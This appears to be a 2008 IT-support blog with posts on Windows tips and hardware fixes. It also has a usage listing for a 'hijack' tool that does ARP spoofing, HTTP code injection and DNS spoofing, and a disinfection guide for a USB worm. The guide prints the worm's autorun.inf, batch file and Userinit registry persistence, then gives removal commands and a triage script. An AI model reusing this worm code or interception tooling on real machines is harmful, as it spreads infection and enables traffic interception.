
Thursday, February 28, 2008

Penetration tool hijack: usage and download

usage: hijack <-LVXhefvqsxrkHDtNzoi> <-d dev> <-S interval> <-l logfile>
<-W normal|byline|none> <-F jobfile> <-p port> <-c http_flag>
<-IO pcap_dump> <-E quit time> <-R reboot time>
<-b submask> <-m speed>
-h is help/usage: show this help text
-V is version information: show the version
-v is be verbose: print detailed information while running
-q is be quiet (don't print packet reception hash marks): quiet mode, no per-packet hash marks
-e is show empty packets: also display packets with no payload
-o is fixed '\0' after replace data offset: after a replacement, pad everything after the replaced data with '\0' bytes
-i is ignore case: match case-insensitively
-S is spoof interval default is 3000 ms: interval between ARP spoofing packets; do not set it too large or the program hangs (a race condition). Against hosts with anti-ARP-spoofing protection, smaller is better
-l is set logfile to record: set a log file; everything the program prints while running is also written to this file
-r is enabled ip routing: enable the system's built-in IP routing; sniff only, packets cannot be modified
-b is to force define submask: force a subnet mask; useful when spoofing across subnets
-m is define max transmit speed k/s: limit the maximum transmit speed in KB/s
-f is set full spoof-route mode default is half: bidirectional (full) spoofing; the default is one-way
-x is print in alternate hexdump format: print captured data as a hex dump
-X is interpret match e-xpression as hexadecimal: the match string is given in hex, e.g. 0x0d0a00
-p is the port to hijack: port whose traffic is hijacked; default is all ports
-c is the flag string to insert for http hijack: marker string identifying the HTTP response packets that code is injected into; default "200 OK"
-I is read packet stream from pcap format file pcap_dump: read packets from a pcap file for offline sniffing
-D is dnsspoof mode: switch to DNS spoofing; the rule file format is unchanged
-t is print timestamp every time a packet is matched: print a timestamp for every matched packet
-E is time to quit #: seconds after which the program exits automatically
-R is time to reboot program #: seconds after which the program restarts itself automatically
-N is release demo job file: write out a sample rule (job) file
-s is scan hosts in subnet: scan the subnet for hosts
-H is hidden from console, background mode killed /k: detach from the console and run in the background; stop it with hijack -k
-k is killed a exists instance: kill a running instance
-O is dump matched packets in pcap format to pcap_dump: save matched packets to a pcap file
-W is set the dump format (normal, byline, none): packet display format, one of normal, by line, or none
-F is read the filter from the specified file: read the rules from the given file
-z is IP faked mode genuine and faked host variable auto switch full spoof#: IP-faking mode; the genuine host and faked host variables take effect and full (bidirectional) spoofing is switched on automatically
-d is use specified device (index): use the network adapter with the given index
-L is show the winpcap device list index: list the WinPcap adapters and their indices

Start → Run: a collection of commands to type

gpedit.msc-----Group Policy
sndrec32-------Sound Recorder
Nslookup-------DNS / IP address lookup
explorer-------open Windows Explorer
logoff---------log off
tsshutdn-------shut down with a 60-second countdown
lusrmgr.msc----Local Users and Groups
services.msc---local services
oobe/msoobe /a----check whether XP is activated
notepad--------Notepad
cleanmgr-------Disk Cleanup
net start messenger----start the Messenger service
compmgmt.msc---Computer Management
net stop messenger-----stop the Messenger service
conf-----------start NetMeeting
dvdplay--------DVD player
charmap--------Character Map
diskmgmt.msc---Disk Management
calc-----------Calculator
dfrg.msc-------Disk Defragmenter
chkdsk.exe-----Chkdsk disk check
devmgmt.msc--- Device Manager
regsvr32 /u *.dll----unregister a DLL
drwtsn32------ Dr. Watson (system debugger)
rononce -p ----15-second shutdown
dxdiag---------DirectX diagnostics
regedt32-------Registry Editor
Msconfig.exe---System Configuration Utility
rsop.msc-------Resultant Set of Policy
mem.exe--------show memory usage
regedit.exe----Registry Editor
winchat--------XP's built-in LAN chat
progman--------Program Manager
winmsd---------System Information
perfmon.msc----Performance Monitor
winver---------check the Windows version
sfc /scannow-----scan protected system files and restore damaged ones
taskmgr-----Task Manager (2000/XP/2003)

Lotus Notes - Archive Setting




DLA - Drive Letter Access

  • Drag and drop files directly to a recordable CD or DVD
  • Process, format, and burn in one easy step
  • Save files and folders to your recorder drive
  • Share and transfer information inexpensively and quickly
  • Make CD-R discs readable by virtually any CD-ROM drive

Drive Letter Access (DLA) turns your CDs and DVDs into virtual hard drives. Burning is easy - and there's no need to pre-stage files. Just drag and drop your data directly to a recordable CD or DVD, then process, format, and burn in one simple step. The final disc will be compatible with almost any Windows computer!

Two types of format
UDF - read, write and delete are all allowed.
CDFS - read-only; writing and deleting are not allowed.



Tuesday, February 19, 2008

Prevent or allow users from changing the IE home page

Open Registry Editor (Start > Run > regedit > OK) and go to [HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]. This key usually does not exist; normally only [HKEY_CURRENT_USER\Software\Policies\Microsoft] is present, so you have to create the remaining subkeys yourself. Once the keys exist, create a new DWORD value under Control Panel named HomePage (case does not matter) and set it to 1. When you now open the IE properties you will find that the home page setting is greyed out. Setting the value back to 0 or deleting it allows changes again. Note that this is a per-user policy: it only protects the home page from the user's own changes through the IE dialog, not from software running in that user's context, which can still rewrite the Start Page value directly.

Infected With Autorun.inf, Mma.bat, Mma.rar, Mma.reg, Mma.vbs

autorun.inf
Code:
[autorun]
open=
shell\open=Open(Sub7@Chatx.net)
shell\open\Command=WScript.exe .\mma.vbs
shell\open\Default=1
shell\explore=explore(Sub7@Chatx.net)
shell\explore\Command=WScript.exe .\mma.vbs


mma.bat
Code:
@echo off
if exist .\mma.reg regedit /s .\mma.reg
if not "%1"=="" goto open
if exist mma.vbs start WScript.exe mma.vbs&exit
if exist %SYSTEMROOT%\system32\mma.vbs start WScript.exe %SYSTEMROOT%\system32\mma.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if "%1"=="+" attrib +s +a +h +r %2\mma.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.inf
:end


mma.reg
Code:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,mma.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000


mma.vbs
Code:
'dranyamcram v1.0
'Davao City Phils
'September 3, 2007
'Sub7@ChatX.net

on error resume next
Set WshShell =CreateObject("WScript.Shell")


For i=1 to 1

set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Solution 1
Download Flash_Disinfector.exe by sUBs and save it to your desktop.
  • Double-click Flash_Disinfector.exe to run it and follow any prompts that may appear.
  • The utility may ask you to insert your flash drive and/or other removable drives. Please do so and allow the utility to clean up those drives as well.
  • Wait until it has finished scanning and then exit the program.
  • Reboot your computer when done.
Note: Flash_Disinfector will create a hidden folder named autorun.inf in each partition and every USB drive plugged in when you ran it. Don't delete this folder...it will help protect your drives from future infection.

Reboot your computer in "Safe Mode" or "Safe Mode With Command Prompt" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode With Command Prompt".

Go to Start > Run and type: cmd
  • press Ok.
  • At the command prompt, type in your primary drive letter, usually C:
  • You may need to change the directory. If so type: cd \
  • Hit Enter.
  • Type: attrib -s -h -r -a autorun.inf
  • Hit Enter.
  • Type: dir
  • Hit Enter. This will allow you to see and confirm the Autorun files.
  • Type: del autorun.inf
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
Now search for and remove Mma.vbs, Mma.rar, Mma.reg, Mma.bat if present.
  • At the command prompt, type in your primary drive letter, usually C:
  • Hit Enter.
  • Type: attrib -s -h -r -a Mma.vbs
  • Hit Enter.
  • Type: dir /s Mma.vbs
  • Hit Enter.
  • If the file is present, type: del Mma.vbs
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
  • Then repeat these instructions for Mma.rar, Mma.reg, Mma.bat
  • Exit the command prompt and reboot normally.
Solution 2
Do the following:

1. Run Task Manager (Ctrl-Alt-Del or right click on Taskbar)
2. Stop the wscript.exe process if it is present: just highlight the process and press END TASK
3. Then terminate explorer.exe process.
4. In Task Manager, click on File -> New Task (Run…).
5. Type “cmd” (without quotes) into the Open text box and click OK.
6. Type the following command one by one followed by hitting Enter key:

Code:
del c:\autorun.* /f /s /q /a
del d:\autorun.* /f /s /q /a


Continue for every drive letter on your PC; for example, if your drives go up to F: del f:\autorun.* /f /s /q /a

7. In Task Manager, click on File -> New Task (Run…).
8. Type regedit into the Open text box and click OK.
9. Navigate to the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

10) Check this value:

"Userinit"="C:\WINDOWS\system32\userinit.exe,"

That is what the registry should contain. If anything else is appended after it, such as mma.bat, just delete that part.


11) Restart your computer in safe mode

12) Disable System Restore

13) Open Notepad and copy the following:

attrib -H -R c:\mma.bat
attrib -H -R c:\mma.rar
attrib -H -R c:\mma.reg
attrib -H -R c:\mma.vbs
attrib -H -R d:\mma.bat
attrib -H -R d:\mma.rar
attrib -H -R d:\mma.reg
attrib -H -R d:\mma.vbs


If you have more drives, just continue the list (for example attrib -H -R f:\mma.vbs)


14) Save it as "remove.bat" and double-click it. (This makes the hidden files visible.)

15) Go to the root directory of each drive and delete all of these:

Code:
mma.bat
mma.rar
mma.reg
mma.vbs
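The checks in Solution 1 and Solution 2 boil down to three questions: does an autorun.inf launch a script host, has anything been appended to the Winlogon Userinit value, and have the hidden Mma.* files been cleared from every drive root. The script below is an added example, not part of the original post and not the worm's or Flash_Disinfector's code. It parses the autorun.inf reproduced above (embedded here as a constructed string), flags the shell\...\Command entries that run WScript.exe, reports anything other than userinit.exe in a Userinit value, and generates the remove.bat from step 13 for any number of drive letters. It is pure Python and runs on any OS; on a live machine you would feed it the file contents and the registry value you read yourself.

```python
"""Offline triage helpers for the Autorun.inf / Mma.* infection above.

Added example, not from the original post. Inputs are the autorun.inf text
and the Winlogon Userinit string, which on a live machine you would read
from the drive root and from the registry key quoted in step 9.
"""

# Constructed sample: the autorun.inf reproduced in the post above.
SAMPLE_AUTORUN = r"""[autorun]
open=
shell\open=Open(Sub7@Chatx.net)
shell\open\Command=WScript.exe .\mma.vbs
shell\open\Default=1
shell\explore=explore(Sub7@Chatx.net)
shell\explore\Command=WScript.exe .\mma.vbs
"""

# Interpreters a legitimate data disc or USB stick almost never needs to
# launch directly from autorun.inf; seeing one here is the red flag.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe", "rundll32.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".bat", ".cmd", ".wsf")
# Keys Windows acts on: open / shellexecute plus any shell\<verb>\command.
LAUNCH_KEYS = {"open", "shellexecute"}
INFECTION_FILES = ("autorun.inf", "mma.bat", "mma.rar", "mma.reg", "mma.vbs")


def parse_autorun(text):
    """Parse the [autorun] section into a dict; keys lower-cased, order kept."""
    entries = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        entries[key.strip().lower()] = value.strip()
    return entries


def _program_name(command):
    """Lower-cased base name of the program a command line launches."""
    parts = command.strip().split()
    if not parts:
        return ""
    exe = parts[0].strip('"')
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def suspicious_autorun_commands(text):
    """Return (key, command) pairs whose command runs a script host or script."""
    hits = []
    for key, value in parse_autorun(text).items():
        if key in LAUNCH_KEYS or key.endswith("\\command"):
            prog = _program_name(value)
            if prog in SCRIPT_HOSTS or prog.endswith(SCRIPT_EXTS):
                hits.append((key, value))
    return hits


def userinit_extras(value):
    """Entries in the Winlogon Userinit value other than userinit.exe itself.

    A clean value is "C:\\WINDOWS\\system32\\userinit.exe," (trailing comma);
    anything else in the comma-separated list is persistence, e.g. mma.bat.
    """
    extras = []
    for entry in value.split(","):
        entry = entry.strip().strip('"')
        if entry and entry.rsplit("\\", 1)[-1].lower() != "userinit.exe":
            extras.append(entry)
    return extras


def removal_batch(drives, names=INFECTION_FILES):
    """Generate the remove.bat from step 13 for any list of drive letters.

    Also clears the S attribute that mma.bat sets (attrib +s +a +h +r),
    which the post's attrib -H -R lines leave in place. Run it before the
    protective autorun.inf folder from Solution 1 exists, since del on a
    folder would empty that folder instead of removing a file.
    """
    lines = ["@echo off"]
    for drive in drives:
        for name in names:
            path = f"{drive}:\\{name}"
            lines.append(f"attrib -s -h -r -a {path}")
            lines.append(f"if exist {path} del /f /q {path}")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for key, cmd in suspicious_autorun_commands(SAMPLE_AUTORUN):
        print(f"autorun.inf: {key} -> {cmd}")
    print("Userinit extras:", userinit_extras("userinit.exe,mma.bat"))
    print(removal_batch(["c", "d"]))
```

On the sample above it reports both shell\open\command and shell\explore\command as launching WScript.exe, returns ["mma.bat"] for the infected Userinit string and an empty list for the clean one, and emits a batch file with an attrib and a del line per file per drive.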



Thursday, February 14, 2008

IBM PC with 3 beeps

IBM PC with a 3-beep POST code: 1 long and 2 short.

Normally just reseating the RAM resolves the problem.

Tried swapping all the parts and reseating the graphics card and RAM, but the problem remained.

Flashed the BIOS to the latest version and the problem was resolved.

Note: on the first boot the IBM logo was displayed abnormally.

Printer - Excel document printed as unrecognizable characters

Lexmark network printer: some Excel documents printed as unrecognizable characters, but printing the same documents to other brands such as HP worked.

Deleted the old printer, installed the latest driver and added the printer again.

Problem resolved.

AVG Internet Security 2013
